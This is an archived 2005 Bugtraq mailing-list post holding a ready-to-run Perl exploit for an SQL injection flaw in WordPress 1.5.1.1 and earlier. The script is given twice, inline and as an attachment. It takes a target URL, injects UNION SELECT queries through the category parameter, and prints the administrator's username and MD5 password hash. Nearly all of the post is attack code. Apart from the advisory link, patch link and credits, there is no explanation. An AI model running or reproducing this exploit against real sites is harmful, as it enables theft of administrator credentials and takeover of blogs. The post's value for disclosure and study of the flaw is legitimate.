[39087] in bugtraq
SQL Injection Exploit for WordPress <= 1.5.1.1
daemon@ATHENA.MIT.EDU (Alberto Trivero)
Tue Jun 7 16:05:59 2005
Message-ID: <002d01c56b98$cfc14cc0$0100a8c0@alberto>
From: "Alberto Trivero" <trivero@jumpy.it>
To: <bugtraq@securityfocus.com>, <news@securiteam.com>,
<submissions@packetstormsecurity.org>, <submit@milw0rm.com>,
<vuln@frsirt.com>
Date: Tue, 7 Jun 2005 21:40:50 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_002A_01C56BA9.92E603C0"
This is a multi-part message in MIME format.
------=_NextPart_000_002A_01C56BA9.92E603C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
#!/usr/bin/perl -w
#
# SQL Injection Exploit for WordPress <= 1.5.1.1
# This exploit show the username of the administrator of the blog and his
password crypted in MD5
# Related advisory:
http://www.securityfocus.com/archive/1/401597/30/0/threaded
# Patch: Download the last version at http://wordpress.org/download/
# Coded by Alberto Trivero
use LWP::Simple;
print "\n\t======================================\n";
print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
print "\t= Alberto Trivero - codebug.org =\n";
print "\t======================================\n\n";
if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
print "Usage:\nperl $0 [full_target_path]\n\n";
print "Examples:\nperl $0 http://www.example.com/wordpress/\n";
exit(0);
}
$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_login%20FROM
%20wp_users/*") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<title>.*?» (.*?)<\/title>/ && print "[+] Username of
administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_pass%20FROM%
20wp_users/*") || die "[-] Unable to retrieve: $!";
$page=~m/<title>.*?» (.*?)<\/title>/ && print "[+] MD5 hash of
password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
------=_NextPart_000_002A_01C56BA9.92E603C0
Content-Type: application/octet-stream;
name="wordpress.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="wordpress.pl"
#!/usr/bin/perl -w
#
# SQL Injection Exploit for WordPress <=3D 1.5.1.1
# This exploit show the username of the administrator of the blog and =
his password crypted in MD5
# Related advisory: =
http://www.securityfocus.com/archive/1/401597/30/0/threaded
# Patch: Download the last version at http://wordpress.org/download/
# Coded by Alberto Trivero
use LWP::Simple;
print =
"\n\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n";
print "\t=3D Exploit for WordPress <=3D 1.5.1.1 =3D\n";
print "\t=3D Alberto Trivero - codebug.org =3D\n";
print =
"\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n\n";
if(!$ARGV[0] or !($ARGV[0]=3D~m/http/)) {
print "Usage:\nperl $0 [full_target_path]\n\n";
print "Examples:\nperl $0 http://www.example.com/wordpress/\n";
exit(0);
}
$page=3Dget($ARGV[0]."index.php?cat=3D%2527%20UNION%20SELECT%20user_login=
%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=3D~m/<title>.*?» (.*?)<\/title>/ && print "[+] Username of =
administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
$page=3Dget($ARGV[0]."index.php?cat=3D%2527%20UNION%20SELECT%20user_pass%=
20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
$page=3D~m/<title>.*?» (.*?)<\/title>/ && print "[+] MD5 hash of =
password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
------=_NextPart_000_002A_01C56BA9.92E603C0--
